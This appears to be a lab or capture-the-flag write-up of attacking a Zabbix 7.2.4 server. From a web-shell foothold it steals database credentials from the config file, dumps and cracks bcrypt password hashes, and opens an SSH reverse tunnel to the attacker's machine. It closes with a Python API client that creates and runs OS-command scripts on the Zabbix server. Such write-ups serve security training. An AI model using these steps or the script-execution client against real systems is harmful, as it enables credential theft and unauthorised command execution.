Zabbix


Evaluating the target Zabbix instance after manual system enumeration from the www-data foothold

Configuration


www-data@zab:/usr/share/zabbix/ui/conf$ cat /etc/apache2/conf-enabled/zabbix.conf
# Define /zabbix alias, this is the default
<IfModule mod_alias.c>
    Alias /zabbix /usr/share/zabbix/ui
</IfModule>
 
<Directory "/usr/share/zabbix/ui">
    Options FollowSymLinks
    AllowOverride None
    Order allow,deny
    Allow from all
 
    <IfModule mod_php.c>
        php_value max_execution_time 300
        php_value memory_limit 128M
        php_value post_max_size 16M
        php_value upload_max_filesize 2M
        php_value max_input_time 300
        php_value max_input_vars 10000
        php_value always_populate_raw_post_data -1
    </IfModule>
 
    <IfModule mod_php7.c>
        php_value max_execution_time 300
        php_value memory_limit 128M
        php_value post_max_size 16M
        php_value upload_max_filesize 2M
        php_value max_input_time 300
        php_value max_input_vars 10000
        php_value always_populate_raw_post_data -1
    </IfModule>
</Directory>
 
<Directory "/usr/share/zabbix/ui/conf">
    Order deny,allow
    Deny from all
    <files *.php>
        Order deny,allow
        Deny from all
    </files>
</Directory>
 
<Directory "/usr/share/zabbix/ui/app">
    Order deny,allow
    Deny from all
    <files *.php>
        Order deny,allow
        Deny from all
    </files>
</Directory>
 
<Directory "/usr/share/zabbix/ui/include">
    Order deny,allow
    Deny from all
    <files *.php>
        Order deny,allow
        Deny from all
    </files>
</Directory>
 
<Directory "/usr/share/zabbix/ui/local">
    Order deny,allow
    Deny from all
    <files *.php>
        Order deny,allow
        Deny from all
    </files>
</Directory>
 
<Directory "/usr/share/zabbix/ui/vendor">
    Order deny,allow
    Deny from all
    <files *.php>
        Order deny,allow
        Deny from all
    </files>
</Directory>

Checking the Apache configuration reveals that the web path /zabbix/ is mapped to the application root at /usr/share/zabbix/ui. The conf/, app/, include/, local/ and vendor/ subdirectories are "Deny from all", so ui/conf/zabbix.conf.php cannot be fetched over HTTP; it is only readable through the filesystem, which is why the www-data shell matters here.

www-data@zab:/usr/share/zabbix/ui/conf$ cat zabbix.conf.php
<?php
// Zabbix GUI configuration file.
 
$DB['TYPE']			= 'MYSQL';
$DB['SERVER']			= 'localhost';
$DB['PORT']			= '0';
$DB['DATABASE']			= 'zabbix';
$DB['USER']			= 'zabbix';
$DB['PASSWORD']			= 'breadandbuttereater121';
 
// Schema name. Used for PostgreSQL.
$DB['SCHEMA']			= '';
 
// Used for TLS connection.
$DB['ENCRYPTION']		= false;
$DB['KEY_FILE']			= '';
$DB['CERT_FILE']		= '';
$DB['CA_FILE']			= '';
$DB['VERIFY_HOST']		= false;
$DB['CIPHER_LIST']		= '';
 
// Vault configuration. Used if database credentials are stored in Vault secrets manager.
$DB['VAULT']			= '';
$DB['VAULT_URL']		= '';
$DB['VAULT_PREFIX']		= '';
$DB['VAULT_DB_PATH']		= '';
$DB['VAULT_TOKEN']		= '';
$DB['VAULT_CERT_FILE']		= '';
$DB['VAULT_KEY_FILE']		= '';
$ZBX_SERVER_NAME		= 'zabbix server';
 
$IMAGE_FORMAT_DEFAULT	= IMAGE_FORMAT_PNG;

The ui/conf/zabbix.conf.php file contains the database credentials, zabbix:breadandbuttereater121, for a MySQL instance on localhost (PORT '0' means the default port, no TLS, and no vault backend, so the password really is stored in the file).
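As an added example (not part of the original write-up), here is a small parser for the $DB[...] assignments in zabbix.conf.php that turns them into a mysql client command line. The embedded SAMPLE_CONF is constructed with a made-up password; the script also flags the case where the file carries no usable secret because the frontend pulls the password from a vault at runtime.

```python
"""Extract the database settings from a Zabbix frontend config file.

Added example, not part of the original write-up: it parses the
$DB['KEY'] = 'value'; assignments in ui/conf/zabbix.conf.php and turns
them into a mysql client invocation, flagging the cases where the file
holds no usable password (vault-backed credentials).
"""
import re
import shlex
from typing import Dict, List

# Constructed sample in the layout of a real zabbix.conf.php (password is made up).
SAMPLE_CONF = """<?php
// Zabbix GUI configuration file.

$DB['TYPE']\t\t\t= 'MYSQL';
$DB['SERVER']\t\t\t= 'localhost';
$DB['PORT']\t\t\t= '0';
$DB['DATABASE']\t\t\t= 'zabbix';
$DB['USER']\t\t\t= 'zabbix';
$DB['PASSWORD']\t\t\t= 'example-password';
$DB['SCHEMA']\t\t\t= '';
$DB['ENCRYPTION']\t\t= false;
$DB['VAULT']\t\t\t= '';
$ZBX_SERVER_NAME\t\t= 'zabbix server';
"""

# One $DB[...] assignment: a single-quoted PHP string (the form Zabbix writes)
# or a bare literal such as false / 0.
_ASSIGN = re.compile(
    r"^\s*\$DB\['(?P<key>[A-Za-z_]+)'\]\s*=\s*(?:'(?P<sq>(?:\\.|[^'\\])*)'|(?P<raw>[^;]+?))\s*;",
    re.MULTILINE,
)

def _unescape(s: str) -> str:
    # PHP single-quoted strings only escape \' and \\ .
    return re.sub(r"\\(['\\])", r"\1", s)

def parse_db_config(text: str) -> Dict[str, str]:
    """Return every $DB[...] key with its (unescaped) value."""
    cfg = {}
    for m in _ASSIGN.finditer(text):
        if m.group("sq") is not None:
            cfg[m.group("key")] = _unescape(m.group("sq"))
        else:
            cfg[m.group("key")] = m.group("raw").strip()
    return cfg

def mysql_command(cfg: Dict[str, str]) -> List[str]:
    """argv for the mysql client; PORT '0' means the server default."""
    if cfg.get("TYPE", "").upper() != "MYSQL":
        raise ValueError(f"not a MySQL frontend config: TYPE={cfg.get('TYPE')!r}")
    if cfg.get("VAULT"):
        # HashiCorp / CyberArk backends: the password is fetched at runtime, not stored here.
        raise ValueError(f"password is fetched from {cfg['VAULT']} at runtime, not stored in the file")
    if not cfg.get("USER"):
        raise ValueError("no DB user in config")
    argv = ["mysql", "-h", cfg.get("SERVER") or "localhost"]
    if cfg.get("PORT") not in (None, "", "0"):
        argv += ["-P", cfg["PORT"]]
    argv += ["-u", cfg["USER"], "-p" + cfg.get("PASSWORD", ""), cfg.get("DATABASE") or "zabbix"]
    return argv

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CONF
    print(shlex.join(mysql_command(parse_db_config(text))))
```

Run it as `python3 zbxconf.py /usr/share/zabbix/ui/conf/zabbix.conf.php` on the target (or pipe the file out first); shlex.join quotes the password so shell metacharacters survive.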

MySQL


www-data@zab:/usr/share/zabbix/ui/conf$ mysql -uzabbix -pbreadandbuttereater121
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 49
Server version: 8.0.41-0ubuntu0.22.04.1 (Ubuntu)
 
Copyright (c) 2000, 2025, Oracle and/or its affiliates.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql> 

Session established

mysql> use zabbix;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
 
mysql> SELECT username,passwd FROM users;
+----------+--------------------------------------------------------------+
| username | passwd                                                       |
+----------+--------------------------------------------------------------+
| Admin    | $2y$10$KA6iPN5sY5.Z4KLerN7XOOO1P7jR8MD2e0SqNRXOsJjV1b.8c5Si. |
| guest    | $2y$10$89otZrRNmde97rIyzclecuk6LwKAsHN0BcvoOKGjbT.BwMBfm7G06 |
+----------+--------------------------------------------------------------+
2 rows in set (0.00 sec)

Dumping the password hashes from the users table. The $2y$10$ prefix identifies bcrypt with cost factor 10 (hashcat mode 3200), which Zabbix 5.0 and later use for stored passwords.

Password Cracking


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zab]
└─$ hashcat -a 0 -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
 
Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$2y$10$89otZrRNmde97rIyzclecuk6LwKAsHN0BcvoOKGjbT.BwMBfm7G06:
$2y$10$KA6iPN5sY5.Z4KLerN7XOOO1P7jR8MD2e0SqNRXOsJjV1b.8c5Si.:dinosaur
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: .\hashes.txt
Time.Started.....: Thu Apr 17 17:17:48 2025 (9 secs)
Time.Estimated...: Thu Apr 17 17:17:57 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1100 H/s (9.61ms) @ Accel:1 Loops:16 Thr:24 Vec:1
Speed.#3.........:       38 H/s (11.58ms) @ Accel:1 Loops:1 Thr:16 Vec:1
Speed.#*.........:     1138 H/s
Recovered........: 2/2 (100.00%) Digests (total), 2/2 (100.00%) Digests (new), 2/2 (100.00%) Salts
Progress.........: 10800/28688770 (0.04%)
Rejected.........: 0/10800 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1008-1024
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:696-697
Candidate.Engine.: Device Generator
Candidates.#1....: munchie -> crazy8
Candidates.#3....: 123456 -> letmein
Hardware.Mon.#1..: Temp: 63c Util: 98% Core:1792MHz Mem:6001MHz Bus:8
Hardware.Mon.#3..: N/A
 
Started: Thu Apr 17 17:17:26 2025
Stopped: Thu Apr 17 17:17:59 2025

hashcat reports an empty plaintext for the guest account (nothing after the colon), which is the default for Zabbix's built-in guest user, and dinosaur for Admin.
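The two steps above, dumping the users table and reading hashcat's results back, as an added example that is not part of the original write-up. It parses the boxed table the mysql client prints, picks the hashcat mode from the hash prefix, and joins hashcat's hash:plain lines back to account names, keeping guest's empty password as a finding instead of dropping it. The sample inputs are the two rows and the two cracked lines shown on this page.

```python
"""Prepare Zabbix password hashes for hashcat and map the results back.

Added example, not part of the original write-up. It parses the ASCII
table printed by `SELECT username,passwd FROM users`, picks the hashcat
mode from the hash prefix, builds the hash list, and joins hashcat's
hash:plain output back to account names. An empty plaintext (the guest
account) is kept as a finding rather than dropped.
"""
import re
from typing import Dict, List, Optional

# The two rows from the dump above, in the layout the mysql CLI prints.
MYSQL_DUMP = """\
+----------+--------------------------------------------------------------+
| username | passwd                                                       |
+----------+--------------------------------------------------------------+
| Admin    | $2y$10$KA6iPN5sY5.Z4KLerN7XOOO1P7jR8MD2e0SqNRXOsJjV1b.8c5Si. |
| guest    | $2y$10$89otZrRNmde97rIyzclecuk6LwKAsHN0BcvoOKGjbT.BwMBfm7G06 |
+----------+--------------------------------------------------------------+
"""

# hashcat's cracked lines for the same hashes (guest's plaintext is empty).
HASHCAT_OUTPUT = """\
$2y$10$89otZrRNmde97rIyzclecuk6LwKAsHN0BcvoOKGjbT.BwMBfm7G06:
$2y$10$KA6iPN5sY5.Z4KLerN7XOOO1P7jR8MD2e0SqNRXOsJjV1b.8c5Si.:dinosaur
"""

_BCRYPT = re.compile(r"^\$2[aby]\$(\d{2})\$[./A-Za-z0-9]{53}$")
_MD5 = re.compile(r"^[0-9a-f]{32}$")

def parse_mysql_table(text: str) -> List[Dict[str, str]]:
    """Turn the mysql CLI's boxed table into a list of row dicts."""
    lines = [l for l in text.splitlines() if l.startswith("|")]
    cells = lambda l: [c.strip() for c in l.strip().strip("|").split("|")]
    header = cells(lines[0])
    return [dict(zip(header, cells(l))) for l in lines[1:]]

def hashcat_mode(h: str) -> Optional[int]:
    """3200 for bcrypt (Zabbix 5.0+), 0 for the unsalted MD5 older Zabbix stored."""
    if _BCRYPT.match(h):
        return 3200
    if _MD5.match(h):
        return 0
    return None

def bcrypt_cost(h: str) -> int:
    """Work factor from the $2y$NN$ prefix; drives the cracking speed estimate."""
    m = _BCRYPT.match(h)
    if not m:
        raise ValueError("not a bcrypt hash")
    return int(m.group(1))

def hash_list(rows: List[Dict[str, str]]) -> List[str]:
    """Unique hashes in first-seen order, one per line for hashcat -a 0 -m 3200."""
    seen, out = set(), []
    for r in rows:
        if r["passwd"] not in seen:
            seen.add(r["passwd"])
            out.append(r["passwd"])
    return out

def join_cracked(rows: List[Dict[str, str]], hashcat_output: str) -> Dict[str, str]:
    """Map username -> plaintext for every hash hashcat reported as cracked."""
    cracked = {}
    for line in hashcat_output.splitlines():
        if ":" not in line:
            continue
        h, plain = line.split(":", 1)   # bcrypt strings never contain ':'
        cracked[h] = plain               # may be "" for an empty password
    return {r["username"]: cracked[r["passwd"]] for r in rows if r["passwd"] in cracked}

if __name__ == "__main__":
    rows = parse_mysql_table(MYSQL_DUMP)
    print("\n".join(hash_list(rows)))                    # contents of hashes.txt
    print(join_cracked(rows, HASHCAT_OUTPUT))
```

Feed `hash_list()` to hashes.txt, run `hashcat -a 0 -m 3200 hashes.txt rockyou.txt`, then pass the output of `hashcat -m 3200 hashes.txt --show` to `join_cracked()`.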

Internal


Initially, the target Zabbix instance reported that it was under maintenance. That is Zabbix's frontend maintenance mode: when ZBX_DENY_GUI_ACCESS is set in ui/conf/maintenance.inc.php, every client outside $ZBX_GUI_ACCESS_IP_RANGE gets the maintenance page instead of the frontend. The likely explanation is that only the localhost address is allowed, which can be checked from the www-data shell by requesting the frontend from the box itself

www-data@zab:/$ curl http://localhost/zabbix/
<!DOCTYPE html><html lang="en" theme="blue-theme" color-scheme="light">	<head>
		<meta http-equiv="X-UA-Compatible" content="IE=Edge"/>
		<meta charset="utf-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<meta name="Author" content="Zabbix SIA" /><title>zabbix server: Zabbix</title>		<link rel="icon" href="favicon.ico">
		<link rel="apple-touch-icon-precomposed" sizes="76x76" href="assets/img/apple-touch-icon-76x76-precomposed.png">
		<link rel="apple-touch-icon-precomposed" sizes="120x120" href="assets/img/apple-touch-icon-120x120-precomposed.png">
		<link rel="apple-touch-icon-precomposed" sizes="152x152" href="assets/img/apple-touch-icon-152x152-precomposed.png">
		<link rel="apple-touch-icon-precomposed" sizes="180x180" href="assets/img/apple-touch-icon-180x180-precomposed.png">
		<link rel="icon" sizes="192x192" href="assets/img/touch-icon-192x192.png">
		<meta name="msapplication-TileImage" content="assets/img/ms-tile-144x144.png">
		<meta name="msapplication-TileColor" content="#d40000">
		<meta name="msapplication-config" content="none"/><link rel="stylesheet" type="text/css" href="assets/styles/blue-theme.css?1740466436"><style>:root {
--severity-color-na-bg: #97AAB3;
--severity-color-info-bg: #7499FF;
--severity-color-warning-bg: #FFC859;
--severity-color-average-bg: #FFA059;
--severity-color-high-bg: #E97659;
--severity-color-disaster-bg: #E45959;
}
.na-bg, .na-bg input[type="radio"]:checked + label, .na-bg:before, .flh-na-bg, .status-na-bg, .status-na-bg:before { background-color: #97AAB3 }
.info-bg, .info-bg input[type="radio"]:checked + label, .info-bg:before, .flh-info-bg, .status-info-bg, .status-info-bg:before { background-color: #7499FF }
.warning-bg, .warning-bg input[type="radio"]:checked + label, .warning-bg:before, .flh-warning-bg, .status-warning-bg, .status-warning-bg:before { background-color: #FFC859 }
.average-bg, .average-bg input[type="radio"]:checked + label, .average-bg:before, .flh-average-bg, .status-average-bg, .status-average-bg:before { background-color: #FFA059 }
.high-bg, .high-bg input[type="radio"]:checked + label, .high-bg:before, .flh-high-bg, .status-high-bg, .status-high-bg:before { background-color: #E97659 }
.disaster-bg, .disaster-bg input[type="radio"]:checked + label, .disaster-bg:before, .flh-disaster-bg, .status-disaster-bg, .status-disaster-bg:before { background-color: #E45959 }
 
</style><script>
			const PHP_ZBX_FULL_DATE_TIME = "Y-m-d h:i:s A";
			const PHP_TZ_OFFSETS = [0];
		</script><script src="js/browsers.js?1740466437"></script></head>
<body><div class="wrapper"><main><div class="server-name">zabbix server</div><div class="signin-container"><div class="signin-logo"><div class="zabbix-logo"></div></div><form method="post" action="index.php" accept-charset="utf-8" aria-label="Sign in"><ul><li><label for="name">Username</label><input type="text" id="name" name="name" value="" maxlength="255" autofocus="autofocus"></li><li><label for="password">Password</label><input type="password" id="password" name="password" value="" maxlength="255" autocomplete="off"></li><li><input type="checkbox" id="autologin" name="autologin" value="1" class="checkbox-radio" checked="checked"><label for="autologin"><span></span>Remember me for 30 days</label></li><li><button type="submit" id="enter" name="enter" value="Sign in">Sign in</button></li></ul></form></div><div class="signin-links"><a target="_blank" rel="noopener noreferrer" class="grey link-alt" href="https://www.zabbix.com/documentation/7.2/">Help</a>&nbsp;&nbsp;&bullet;&nbsp;&nbsp;<a target="_blank" rel="noopener noreferrer" class="grey link-alt" href="https://www.zabbix.com/support">Support</a></div></main><footer role="contentinfo">&copy; 2001&ndash;2025, <a class="grey link-alt" target="_blank" rel="noopener noreferrer" href="https://www.zabbix.com/">Zabbix SIA</a></footer></div></body>

As shown above, a request from 127.0.0.1 gets the normal login page, confirming that access is filtered by source address rather than actually being down for maintenance
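For reference, an added example (not a file read from this target, and not the author's own listing) of the settings in Zabbix's ui/conf/maintenance.inc.php that produce this behaviour; the allowed address list and the message text are assumptions:

```php
<?php
// Zabbix frontend maintenance mode (stock conf/maintenance.inc.php layout).
// While this define is present, every request whose source address is not
// listed in $ZBX_GUI_ACCESS_IP_RANGE receives the "under maintenance" page.
define('ZBX_DENY_GUI_ACCESS', 1);

// Addresses that still get the normal frontend. 127.0.0.1 here is the
// assumption that explains why curl from the box itself returns the login page.
$ZBX_GUI_ACCESS_IP_RANGE = ['127.0.0.1'];

// Message shown to everyone else (constructed text).
$ZBX_GUI_ACCESS_MESSAGE = 'Zabbix is under maintenance.';
```

From the www-data shell, `cat /usr/share/zabbix/ui/conf/maintenance.inc.php` confirms which addresses are exempt before any tunnelling effort is spent.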

Tunneling


To reach the Zabbix frontend from Kali I need to tunnel to the target's loopback interface. The foothold is a www-data shell with no SSH login to the target, so local port forwarding from Kali is not an option; instead I open an SSH session from the target back to Kali and use remote port forwarding (-R).

www-data@zab:/$ ssh -f -N -R 127.0.0.1:8888:localhost:80 kali@192.168.45.155
kali@192.168.45.155's password: kali

SSH tunnel established. Kali's sshd now listens on 127.0.0.1:8888 and forwards everything arriving there through the tunnel to localhost:80 on the target, so the frontend is reachable from Kali at http://127.0.0.1:8888/zabbix/. Because Apache sees the connection arriving from the target's own loopback, the maintenance-mode address filter is satisfied. -f backgrounds the session and -N runs no remote command. Note that the Kali password is typed into a shell on the compromised host; a throwaway key or account for the attack box is the safer choice.

Authentication


Authentication successful with the cracked password of the Admin user

Version Information


The version information is disclosed; 7.2.4

Scripts


Zabbix's global scripts feature executes OS commands against registered hosts. Depending on the script's "Execute on" setting the command runs on the Zabbix server, on the Zabbix proxy, or on the host's Zabbix agent. On the server side it runs as the zabbix service account; on the agent side it only works if the agent configuration allows system.run (AllowKey=system.run[*]), which is off by default. Every script creation and execution is written to the Zabbix audit log.

Looking further into the application, the Scripts feature is available under the Alerts section. Moving on to the Lateral Movement phase.
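As an added example (not the author's code and not Zabbix's own), the same Scripts workflow driven through the frontend's JSON-RPC API: user.login, script.create for a script that runs on the Zabbix server, and script.execute against one host. The API URL through the tunnel, the host ID 10084 and the command `id` are assumptions; FakeTransport answers with constructed replies so the flow runs offline, while _http_transport is the real one.

```python
"""Drive Zabbix global scripts through the frontend's JSON-RPC API.

Added example, not code from the original write-up or from Zabbix. It
performs the three calls behind Alerts > Scripts: user.login,
script.create (a script that runs on the Zabbix server) and
script.execute against one host. API_URL, HOST_ID and the command are
assumptions; FakeTransport answers with constructed responses so the
flow can run offline, while _http_transport is the real one.
"""
import json
import urllib.request

API_URL = "http://127.0.0.1:8888/zabbix/api_jsonrpc.php"  # via the SSH tunnel (assumed)
HOST_ID = "10084"                                         # assumed hostid of a monitored host

class ZabbixAPIError(Exception):
    pass

def _http_transport(url: str, body: bytes, headers: dict) -> bytes:
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read()

class FakeTransport:
    """Replays constructed API replies and records every request (offline use)."""
    def __init__(self, error_on: str = ""):
        self.requests = []
        self.error_on = error_on

    def __call__(self, url: str, body: bytes, headers: dict) -> bytes:
        req = json.loads(body)
        self.requests.append((req, headers))
        if req["method"] == self.error_on:
            reply = {"error": {"code": -32602, "message": "Invalid params.",
                               "data": "No permissions to referred object or it does not exist!"}}
        elif req["method"] == "user.login":
            reply = {"result": "0123456789abcdef0123456789abcdef"}   # constructed session token
        elif req["method"] == "script.create":
            reply = {"result": {"scriptids": ["7"]}}
        elif req["method"] == "script.execute":
            reply = {"result": {"response": "success", "value": "uid=1001(zabbix)\n"}}  # constructed
        else:
            reply = {"error": {"code": -32601, "message": "Method not found."}}
        return json.dumps({"jsonrpc": "2.0", "id": req["id"], **reply}).encode()

class ZabbixAPI:
    def __init__(self, url: str, transport=_http_transport):
        self.url, self.transport, self.token, self._id = url, transport, None, 0

    def call(self, method: str, params: dict):
        self._id += 1
        body = json.dumps({"jsonrpc": "2.0", "method": method, "params": params, "id": self._id}).encode()
        headers = {"Content-Type": "application/json-rpc"}
        if self.token:  # 7.x: the session token goes in the Authorization header, not an "auth" field
            headers["Authorization"] = "Bearer " + self.token
        reply = json.loads(self.transport(self.url, body, headers))
        if "error" in reply:
            e = reply["error"]
            raise ZabbixAPIError(f"{method}: {e.get('message', '')} {e.get('data', '')}".strip())
        return reply["result"]

    def login(self, username: str, password: str) -> str:
        self.token = self.call("user.login", {"username": username, "password": password})
        return self.token

    def create_server_script(self, name: str, command: str) -> str:
        # type 0 = script, scope 2 = manual host action, execute_on 1 = Zabbix server
        res = self.call("script.create", {"name": name, "command": command,
                                          "type": 0, "scope": 2, "execute_on": 1})
        return res["scriptids"][0]

    def execute(self, scriptid: str, hostid: str) -> str:
        return self.call("script.execute", {"scriptid": scriptid, "hostid": hostid})["value"]

def run_offline_demo(transport=None):
    """Login, create a script that runs `id` on the server, execute it against HOST_ID."""
    transport = transport or FakeTransport()
    api = ZabbixAPI(API_URL, transport)
    api.login("Admin", "dinosaur")
    scriptid = api.create_server_script("whoami-check", "id")
    output = api.execute(scriptid, HOST_ID)
    return output, transport

if __name__ == "__main__":
    out, t = run_offline_demo()
    print(out.strip(), "| calls:", [r["method"] for r, _ in t.requests])
```

To run it against the real instance, pass no transport (`ZabbixAPI(API_URL)` uses urllib). Each of the three calls appears in Reports > Audit log with the user, the script and the command, which is the trail a defender would look for after an Admin password compromise.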